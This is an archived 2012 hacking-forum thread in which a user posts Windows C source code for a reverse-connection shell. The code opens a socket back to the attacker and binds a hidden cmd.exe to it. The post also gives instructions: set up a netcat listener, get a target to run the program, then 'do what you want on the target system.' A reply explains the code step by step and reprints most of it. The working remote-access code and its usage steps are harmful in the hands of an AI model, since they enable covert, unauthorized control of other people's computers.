This forum is in archive mode. You will not be able to post new content.
Pages: [1]

Author Topic: Reverse Connection Shell (code)  (Read 2379 times)

0 Members and 1 Guest are viewing this topic.

Offline Infinityexists

  • Peasant
  • *
  • Posts: 74
  • Cookies: 1
    • View Profile
Reverse Connection Shell (code)
« on: March 17, 2012, 06:53:06 PM »

I've found this somewhere but didn't understand how it works , maybe some of you could help understanding this




Reverse Connection Shell ,



This would be used to connect back to you and spawn a CMD shell on the target's system. Yes you can use the CMD on the target system, that is the whole point.




1. Set Netcat to listen on your system with the Port and IP specified in the example (Change both to your liking): nc -lvvp 1977.


2. When someone runs this RevCon it connects back to you through the Port and IP specified and gives you a CMD shell on their system through Netcat.


3. Do what you want on the target system.

Code: [Select]
#include <winsock2.h>
#pragma comment(lib,"ws2_32")


void main()
{
WSADATA a;
SOCKET b;
STARTUPINFO c;
PROCESS_INFORMATION d;
struct sockaddr_in e;
memset(&e,0,sizeof(e));
memset(&c,0,sizeof(c));
WSAStartup(0x202,&a);                                      //Version: 0x202 = 2.2
b=WSASocket(2,1,6,0,0,0);
e.sin_family=0x2;                                        //0x2 = AF_INET
e.sin_port=ntohs(0x7B9);                                //Port: 0x7B9 = 1977
e.sin_addr.s_addr=inet_addr("127.0.0.1");
connect(b,(struct sockaddr*)&e,sizeof(e));
c.cb=sizeof(c);
c.dwFlags=0x00000100;                                 //0x00000100 = STARTF_USESTDHANDLES
c.hStdInput=c.hStdOutput=c.hStdError=(void*)b;
CreateProcess(0,"cmd",0,0,1,0x08000000,0,0,&c,&d);  //1 = TRUE, 0x08000000 = CREATE_NO_WINDOW
}
Report to moderator   Logged

Offline Kulverstukas

  • Administrator
  • Zeus
  • *
  • Posts: 6627
  • Cookies: 542
  • Fascist dictator
    • View Profile
    • My blog
Re: Reverse Connection Shell (code)
« Reply #1 on: March 17, 2012, 07:23:57 PM »
I think you just answered your own question :P

BTW: Why such big spaces between paragraphs?
Report to moderator   Logged

Offline neusbeer

  • Knight
  • **
  • Posts: 223
  • Cookies: 11
  • Beer makes you stronger XD
    • View Profile
    • http://www.facebook.nl/hackneus
Re: Reverse Connection Shell (code)
« Reply #2 on: March 17, 2012, 07:27:13 PM »
Quote from: Kulverstukas on March 17, 2012, 07:23:57 PM
I think you just answered your own question :P

BTW: Why such big spaces between paragraphs?
I have the same 'problem'.. I always have to edit again to delete the extra empty spaces.
1 linebreak acts as 2, something to do with unix or win char encoding..
Report to moderator   Logged
--Neusbeer

Offline ca0s

  • VIP
  • Sir
  • *
  • Posts: 432
  • Cookies: 53
    • View Profile
    • ka0labs #
Re: Reverse Connection Shell (code)
« Reply #3 on: March 17, 2012, 11:46:08 PM »
What are you asking for? A description of how the code works?
It opens a socket to the desired address (127.0.0.1 in the code). This is the biggest part of the code:
Code: [Select]
WSADATA a;
SOCKET b;
struct sockaddr_in e;
memset(&e,0,sizeof(e));

WSAStartup(0x202,&a);                                      //Version: 0x202 = 2.2
b=WSASocket(2,1,6,0,0,0);
e.sin_family=0x2;                                        //0x2 = AF_INET
e.sin_port=ntohs(0x7B9);                                //Port: 0x7B9 = 1977
e.sin_addr.s_addr=inet_addr("127.0.0.1");
connect(b,(struct sockaddr*)&e,sizeof(e));
The it creates a cmd.exe process with its stdin and stdout handles redirected to that socket.
Code: [Select]
TARTUPINFO c;
PROCESS_INFORMATION d;

memset(&c,0,sizeof(c));

c.cb=sizeof(c);
c.dwFlags=0x00000100;                                 //0x00000100 = STARTF_USESTDHANDLES
c.hStdInput=c.hStdOutput=c.hStdError=(void*)b;
CreateProcess(0,"cmd",0,0,1,0x08000000,0,0,&c,&d);  //1 = TRUE, 0x08000000 = CREATE_NO_WINDOW
Report to moderator   Logged
Pages: [1]
 



Want to be here? Contact Ande, Factionwars or Kulverstukas on the forum or at IRC.